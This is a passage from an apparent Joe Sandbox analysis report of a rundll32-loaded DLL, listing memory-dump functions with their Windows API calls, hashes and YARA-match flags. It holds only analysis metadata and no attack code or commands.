                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 168474834-0
                                                                                                                      • Opcode ID: 682e8427e4eae8e26461a3ae413d84982b563dbbe5be57b0626e4beef210c331
                                                                                                                      • Instruction ID: 20fc1444fe35ab48259a21c9388e4acfe4ba196ce7874d1294122afbb026df8a
                                                                                                                      • Opcode Fuzzy Hash: 682e8427e4eae8e26461a3ae413d84982b563dbbe5be57b0626e4beef210c331
                                                                                                                      • Instruction Fuzzy Hash: 5111CAB6500604BBDB22DFA6CD89C6FBBEDEF897407514029FA01C6121DA31E940D728
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetSystemMetrics.USER32 ref: 10020F3B
                                                                                                                      • GetSystemMetrics.USER32 ref: 10020F42
                                                                                                                      • GetSystemMetrics.USER32 ref: 10020F49
                                                                                                                      • GetSystemMetrics.USER32 ref: 10020F53
                                                                                                                      • GetDC.USER32(00000000), ref: 10020F5D
                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 10020F6E
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 10020F76
                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 10020F7E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: MetricsSystem$CapsDevice$Release
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1151147025-0
                                                                                                                      • Opcode ID: cd0d00d3bf09b09063c79ec0fd26ae0b7f2f0b754747fdae3c9245efa7409752
                                                                                                                      • Instruction ID: 9c0db37145597a9d8002a30536ddf2583a3ab63f37cab70819204e46a6a6359b
                                                                                                                      • Opcode Fuzzy Hash: cd0d00d3bf09b09063c79ec0fd26ae0b7f2f0b754747fdae3c9245efa7409752
                                                                                                                      • Instruction Fuzzy Hash: 84F09670A40714AEF7206F718D8DF277BA4EBC6B51F01442AE611CB2D0D6B598018F50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10018224
                                                                                                                      • MapDialogRect.USER32(?,00000000), ref: 100182B5
                                                                                                                      • SysAllocStringLen.OLEAUT32(?,?), ref: 100182D4
                                                                                                                      • CLSIDFromString.OLE32(?,?), ref: 100183C6
                                                                                                                        • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                      • CLSIDFromProgID.OLE32(?,?), ref: 100183CE
                                                                                                                      • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013), ref: 10018468
                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 100184BA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: String$From$AllocDialogFreeH_prolog3ProgRectWindow_malloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2841959276-0
                                                                                                                      • Opcode ID: 5a69a964b2229b4de645fa0737a3e44a531c48ca18053bc0dcb6ac84ec84f31a
                                                                                                                      • Instruction ID: 14de686d86220a01eaba4d8e7e4af7f56c4348460245bd7539e940c5f7eef93d
                                                                                                                      • Opcode Fuzzy Hash: 5a69a964b2229b4de645fa0737a3e44a531c48ca18053bc0dcb6ac84ec84f31a
                                                                                                                      • Instruction Fuzzy Hash: 99B1F075900219AFDB44CFA8C984AEE7BF4FF08344F41812AFC199B251E774EA94CB94
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10029D39
                                                                                                                      • _memset.LIBCMT ref: 10029DA5
                                                                                                                        • Part of subcall function 1002BDD9: _memset.LIBCMT ref: 1002BDE1
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 10029DE5
                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 10029E66
                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 10029E75
                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 10029E84
                                                                                                                      • VariantClear.OLEAUT32(00000000), ref: 10029E99
                                                                                                                        • Part of subcall function 1002981B: __EH_prolog3.LIBCMT ref: 10029837
                                                                                                                        • Part of subcall function 1002981B: VariantClear.OLEAUT32(?), ref: 1002989C
                                                                                                                        • Part of subcall function 1002BDB9: VariantCopy.OLEAUT32(?,?), ref: 1002BDC7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearFreeString$H_prolog3_memset$Copy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2905758408-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeString$_memset$ClearH_prolog3Variant
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3574576181-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 1001658F
                                                                                                                      • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 1001664B
                                                                                                                      • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 10016662
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 1001667C
                                                                                                                      • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 1001668E
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseEnumH_prolog3OpenQueryValue
                                                                                                                      • String ID: Software\
                                                                                                                      • API String ID: 3878845136-964853688
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetParent.USER32(?), ref: 1001AC38
                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1001AC5F
                                                                                                                      • UpdateWindow.USER32 ref: 1001AC79
                                                                                                                      • SendMessageA.USER32 ref: 1001AC9D
                                                                                                                      • SendMessageA.USER32 ref: 1001ACB7
                                                                                                                      • UpdateWindow.USER32 ref: 1001ACFD
                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 1001AD31
                                                                                                                        • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                      Similarity
                                                                                                                      • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2853195852-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$ActiveCaptureFocusLastPopup
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3219385341-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetWindow.USER32(?,00000002), ref: 1002A21B
                                                                                                                      • GetParent.USER32(?), ref: 1002A22C
                                                                                                                      • GetWindow.USER32(?,00000002), ref: 1002A24F
                                                                                                                      • GetWindow.USER32(?,00000002), ref: 1002A261
                                                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 1002A270
                                                                                                                      • IsWindowVisible.USER32(?), ref: 1002A28A
                                                                                                                      • GetTopWindow.USER32(?), ref: 1002A2B0
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$LongParentVisible
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 506644340-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • ___set_flsgetvalue.LIBCMT ref: 10032AB8
                                                                                                                      • __calloc_crt.LIBCMT ref: 10032AC4
                                                                                                                      • CreateThread.KERNEL32(00000002,?,V&',00000000,?,1001623D), ref: 10032B08
                                                                                                                      • GetLastError.KERNEL32(?,1001623D,?,?,100160A8,?,00000002,00000030,?,00000000), ref: 10032B12
                                                                                                                      • __dosmaperr.LIBCMT ref: 10032B2A
                                                                                                                        • Part of subcall function 100311F4: __getptd_noexit.LIBCMT ref: 100311F4
                                                                                                                        • Part of subcall function 10037753: __decode_pointer.LIBCMT ref: 1003775C
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd_noexit
                                                                                                                      • String ID: V&'
                                                                                                                      • API String ID: 1067611704-802299783
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10016C9F: _memset.LIBCMT ref: 10016CB6
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013DA
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013EC
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 100013FE
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001410
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001422
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001446
                                                                                                                      • Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 10001458
                                                                                                                        • Part of subcall function 100136C0: LoadIconA.USER32 ref: 100136D2
                                                                                                                      Similarity
                                                                                                                      • API ID: ProcessorVirtual$Concurrency::RootRoot::$IconLoad_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2004563703-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 10017660
                                                                                                                      • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10017683
                                                                                                                      • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1001769F
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 100176AF
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 100176B9
                                                                                                                      Strings
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCreate$Open
                                                                                                                      • String ID: software
                                                                                                                      • API String ID: 1740278721-2010147023
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 100011B6
                                                                                                                        • Part of subcall function 10018A6F: __EH_prolog3.LIBCMT ref: 10018A76
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 100011C8
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 100011EC
                                                                                                                        • Part of subcall function 10018AC4: __EH_prolog3.LIBCMT ref: 10018ACB
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 100011FE
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 10001210
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 10001222
                                                                                                                      • ~_Task_impl.LIBCPMT ref: 10001231
                                                                                                                        • Part of subcall function 10018662: __EH_prolog3.LIBCMT ref: 10018669
                                                                                                                        • Part of subcall function 10016C14: __EH_prolog3.LIBCMT ref: 10016C1B
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Task_impl$H_prolog3
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1204490572-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 10020A95
                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 10020A9F
                                                                                                                        • Part of subcall function 10033135: RaiseException.KERNEL32(?,?,?,?), ref: 10033175
                                                                                                                      • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004), ref: 10020AB6
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020AC3
                                                                                                                        • Part of subcall function 100201BD: __CxxThrowException@8.LIBCMT ref: 100201D1
                                                                                                                      • _memset.LIBCMT ref: 10020AE2
                                                                                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 10020AF3
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020B14
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 356813703-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Color$Brush
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2798902688-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3.LIBCMT ref: 10029837
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 1002989C
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 10029AAB
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 10029B1D
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 10029D0E
                                                                                                                        • Part of subcall function 1002BDB9: VariantCopy.OLEAUT32(?,?), ref: 1002BDC7
                                                                                                                        • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                        • Part of subcall function 1002C06F: __EH_prolog3.LIBCMT ref: 1002C079
                                                                                                                        • Part of subcall function 1002C06F: lstrlenA.KERNEL32(?,00000224,10029CDA,?,00000008,00000000,?,000000CC), ref: 1002C098
                                                                                                                        • Part of subcall function 1002C06F: SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 1002C0A0
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$Clear$H_prolog3$AllocAllocatorByteCopyDebugException@8HeapStringThrowlstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 63617653-0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __EH_prolog3_catch_GS.LIBCMT ref: 1002D1F0
                                                                                                                      • lstrlenA.KERNEL32(00000000,000000FF,00000050,10022221,00000000,00000001,?,?,000000FF,?,?,?), ref: 1002D222
                                                                                                                        • Part of subcall function 10017790: _memcpy_s.LIBCMT ref: 100177A0
                                                                                                                      • _memset.LIBCMT ref: 1002D2F2
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 1002D3D1
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ClearH_prolog3_catch_Variant_memcpy_s_memsetlstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4021759052-0
                                                                                                                      • Opcode ID: dc537336900b1f9e5654c723f7bc7d689170c1efb2efdbad80408bb984cec35a
                                                                                                                      • Instruction ID: 5c01f4bcc98ccee0a604cdfa5feeb0fdece88e80b40f5b50a3c571396f452454
                                                                                                                      • Opcode Fuzzy Hash: dc537336900b1f9e5654c723f7bc7d689170c1efb2efdbad80408bb984cec35a
                                                                                                                      • Instruction Fuzzy Hash: 50A18C35C04249DBCF11EFA4E985AEEBBF0FF04350FA0415AE914AB291D734AE41DB61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 1002D5FF
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 1002D650
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 1002D674
                                                                                                                        • Part of subcall function 100200B9: __EH_prolog3.LIBCMT ref: 100200C0
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 1002D6CC
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 1002D6F5
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 1002D724
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocString$H_prolog3_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 842698744-0
                                                                                                                      • Opcode ID: 4c578374896238df2dea9fd45ffcc7e6003ce540e2fdc04b6e0d27b1621fe4e8
                                                                                                                      • Instruction ID: 1a39fa9d0276ee84c07bd3808c66cb0226ddbd666de5b2da3b26845cb98b16c2
                                                                                                                      • Opcode Fuzzy Hash: 4c578374896238df2dea9fd45ffcc7e6003ce540e2fdc04b6e0d27b1621fe4e8
                                                                                                                      • Instruction Fuzzy Hash: 2A414A34900204CFDB24EFB8D891AADB7B5EF04314F50852EF9659B2A2DB74A854CF55
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 10016936: GetParent.USER32(100010EC), ref: 10016989
                                                                                                                        • Part of subcall function 10016936: GetLastActivePopup.USER32(100010EC), ref: 10016998
                                                                                                                        • Part of subcall function 10016936: IsWindowEnabled.USER32(100010EC), ref: 100169AD
                                                                                                                        • Part of subcall function 10016936: EnableWindow.USER32(100010EC,00000000), ref: 100169C0
                                                                                                                      • EnableWindow.USER32(?,00000001), ref: 10016A2E
                                                                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 10016A3C
                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 10016A46
                                                                                                                      • SendMessageA.USER32 ref: 10016A5B
                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10016AD8
                                                                                                                      • EnableWindow.USER32(?,00000001), ref: 10016B14
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1877664794-0
                                                                                                                      • Opcode ID: 95381fcf6bb93498e4705e7f988ebefb44252e0409dc997f8ee4f854a67ce631
                                                                                                                      • Instruction ID: 27039e4540ef9999db1a35b9c590bf271b8d22289eaaf12d3c9627bdabeff3d4
                                                                                                                      • Opcode Fuzzy Hash: 95381fcf6bb93498e4705e7f988ebefb44252e0409dc997f8ee4f854a67ce631
                                                                                                                      • Instruction Fuzzy Hash: CE416A72A00258DBEB30CFA4CC81BDE77A8EF09350F614119E949EB281EB70D9848F52
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetWindowLongA.USER32(100010EC,000000F0), ref: 10016968
                                                                                                                      • GetParent.USER32(100010EC), ref: 10016976
                                                                                                                      • GetParent.USER32(100010EC), ref: 10016989
                                                                                                                      • GetLastActivePopup.USER32(100010EC), ref: 10016998
                                                                                                                      • IsWindowEnabled.USER32(100010EC), ref: 100169AD
                                                                                                                      • EnableWindow.USER32(100010EC,00000000), ref: 100169C0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 670545878-0
                                                                                                                      • Opcode ID: 0556ac702c88567a1be081abf13cc9cce852e4592f4cca89957eeb32636ff491
                                                                                                                      • Instruction ID: 154aafdfd528b469a8bf80fc48512ff59873e22bfc4d6b8fcadc8b05587993e6
                                                                                                                      • Opcode Fuzzy Hash: 0556ac702c88567a1be081abf13cc9cce852e4592f4cca89957eeb32636ff491
                                                                                                                      • Instruction Fuzzy Hash: D111A57260133697D661DB698E80B1BB6ECDF9EAE1F120115ED00EF254EB70DC808696
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • ClientToScreen.USER32(?,?), ref: 10020568
                                                                                                                      • GetDlgCtrlID.USER32 ref: 1002057C
                                                                                                                      • GetWindowLongA.USER32(00000000,000000F0), ref: 1002058A
                                                                                                                      • GetWindowRect.USER32 ref: 1002059C
                                                                                                                      • PtInRect.USER32(?,?,?), ref: 100205AC
                                                                                                                      • GetWindow.USER32(?,00000005), ref: 100205B9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1315500227-0
                                                                                                                      • Opcode ID: 6e799736a4181f77db8ba904b29fc337daefc7dc264e49bf5415e2b3170b0d90
                                                                                                                      • Instruction ID: 9197e044a219b4c4c22350dcb983fe24fb7029e94376554506d026f7e511957d
                                                                                                                      • Opcode Fuzzy Hash: 6e799736a4181f77db8ba904b29fc337daefc7dc264e49bf5415e2b3170b0d90
                                                                                                                      • Instruction Fuzzy Hash: 3B01A235501739EBEB11DF549C48E9F3BADEF4A791F404011FD10D2061E730DA018B99
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: _memset
                                                                                                                      • String ID: @$@$AfxFrameOrView80s$AfxMDIFrame80s
                                                                                                                      • API String ID: 2102423945-4122032997
                                                                                                                      • Opcode ID: 34855274ca0ecd676c0cb297c8efdd531dfb4bca4f276cdc03237f3f296c8161
                                                                                                                      • Instruction ID: bbe41a20c7329c8f9bdc0efe2c46215e461a01fcfe5e7bc54fed728f21783543
                                                                                                                      • Opcode Fuzzy Hash: 34855274ca0ecd676c0cb297c8efdd531dfb4bca4f276cdc03237f3f296c8161
                                                                                                                      • Instruction Fuzzy Hash: B0816076D04219AADB40EFA4D481BDEBBF8EF04384F518566F909EB181E774DAC4CB90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GlobalLock.KERNEL32 ref: 10021DB2
                                                                                                                      • lstrlenA.KERNEL32(?), ref: 10021DFA
